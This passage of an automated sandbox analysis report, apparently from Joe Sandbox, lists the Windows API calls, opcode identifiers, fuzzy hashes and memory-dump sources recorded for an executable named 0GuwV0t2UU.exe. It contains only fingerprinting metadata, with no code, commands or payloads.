                                                        • Opcode Fuzzy Hash: 6ec1cb72de713890a7fe95da29bb3e661ce5d0c083e3d0a32e7bda596729ac32
                                                        • Instruction Fuzzy Hash: B0017C71A04615ABEB149F94DE58BAFB668EF80348F10443EF101B61D0D7B85E41976D
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                        • Instruction ID: 0f6a82c9814b8130565900c4f77509fb73920235a48305220d01948b4924e2c4
                                                        • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                        • Instruction Fuzzy Hash: 31317170640219BBDB22DF59ED48A9E3FA8EB00359F10443BF904FA1D1D3788E519BA9
                                                        APIs
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,00000000,00000011,00000002), ref: 00402622
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID:
                                                        • API String ID: 3356406503-0
                                                        • Opcode ID: bbb01790bf66a898ec7bf5f4dca0a31f0af5c2fa46adf20976a7ac42051af756
                                                        • Instruction ID: a1e8d7c51e2174fe69d0a38a45018fa5c8ecdbf0c3d6cccc33ed9d3604573096
                                                        • Opcode Fuzzy Hash: bbb01790bf66a898ec7bf5f4dca0a31f0af5c2fa46adf20976a7ac42051af756
                                                        • Instruction Fuzzy Hash: 5A119E71A0421AEADF15DFA0DA589AEB7B4FF04348F20443FE402B62D0D3B88A45DB5D
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                        • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                        • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                        • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                        APIs
                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402484
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteValue
                                                        • String ID:
                                                        • API String ID: 2831762973-0
                                                        • Opcode ID: e118d0f5239d51441db66db07306c34d39c8aa15a5d7cfe4e748fc358846e0cc
                                                        • Instruction ID: e2e4e8893df5a4528a6e21454bcdecfabc6281ca852765cce5f9bf4b5ee6cd51
                                                        • Opcode Fuzzy Hash: e118d0f5239d51441db66db07306c34d39c8aa15a5d7cfe4e748fc358846e0cc
                                                        • Instruction Fuzzy Hash: 63F09632A04521ABDB10BBA9DB8EAEE72A5AB44354F11443FF542B71C1CAFC4D02977D
                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C38
                                                        • GetLastError.KERNEL32 ref: 00405C46
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                        • Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
                                                        • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                        • Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
                                                        APIs
                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableShow
                                                        • String ID:
                                                        • API String ID: 1136574915-0
                                                        • Opcode ID: df5424ac206c7c619d61ed962fba1d912f5595003d61f115a6d45933f49013a7
                                                        • Instruction ID: fe372041eca2d55525124f815bce62a7554e94faae4ddb110be7aaab9f19639a
                                                        • Opcode Fuzzy Hash: df5424ac206c7c619d61ed962fba1d912f5595003d61f115a6d45933f49013a7
                                                        • Instruction Fuzzy Hash: 40E04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405CAE
                                                        • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405CBB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3712363035-0
                                                        • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                        • Instruction ID: 3c730061575d40878ccbcf559f5dc137d48881e2855f55d79af12727e8fe0db1
                                                        • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                        • Instruction Fuzzy Hash: 0BE0BFB4600219BFFB109B64EE49F7B7B7CE700644F418425BD14F2591D77498149A7C
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                          • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                          • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
                                                          • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                        • Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
                                                        • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                        • Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 00406196
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                        • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                        • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                        • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403658,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                        • Instruction ID: 868687b2a80a8d4cb6d5034857ca3092976d2c25b2f3b55ea206b3a8d14aaeda
                                                        • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                        • Instruction Fuzzy Hash: C7C04C30608701DAEA105B31DE8CB177A50BB54741F198439A582F41B0DA348555D92D
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000), ref: 738B2C57
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3172815841.00000000738B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3172732409.00000000738B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173096944.00000000738B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173194995.00000000738B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_738b0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 45dd672330a7d39db57fb0bcb915240dc351b231a6744479896ae4133abc33ec
                                                        • Instruction ID: a0affdbde80f8d211250bc9ed0f55adbc7878865906a5286e47ea0c911f4fed3
                                                        • Opcode Fuzzy Hash: 45dd672330a7d39db57fb0bcb915240dc351b231a6744479896ae4133abc33ec
                                                        • Instruction Fuzzy Hash: 004190B250068FDFEB11EFE9D881B5E377AEB04350F348525E509C6350EA3DA882CB90
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                          • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: FilePointerwsprintf
                                                        • String ID:
                                                        • API String ID: 327478801-0
                                                        • Opcode ID: 71ec0585dfc1f5a4deb38e390d125e8dba0ecba5ee550c3c95508aededf6839d
                                                        • Instruction ID: 25ca00dcee0cf0708ebb41b42c3bcfe7940f6ca7f4ca5ddd9dc2277bf7af936e
                                                        • Opcode Fuzzy Hash: 71ec0585dfc1f5a4deb38e390d125e8dba0ecba5ee550c3c95508aededf6839d
                                                        • Instruction Fuzzy Hash: 04E06D71A08104AAEB04ABA5AE49CAF7379AF90345B20443FF101B00D8C6794D119A2D
                                                        APIs
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040240E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWrite
                                                        • String ID:
                                                        • API String ID: 390214022-0
                                                        • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                        • Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
                                                        • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                        • Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D
                                                        APIs
                                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406566
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
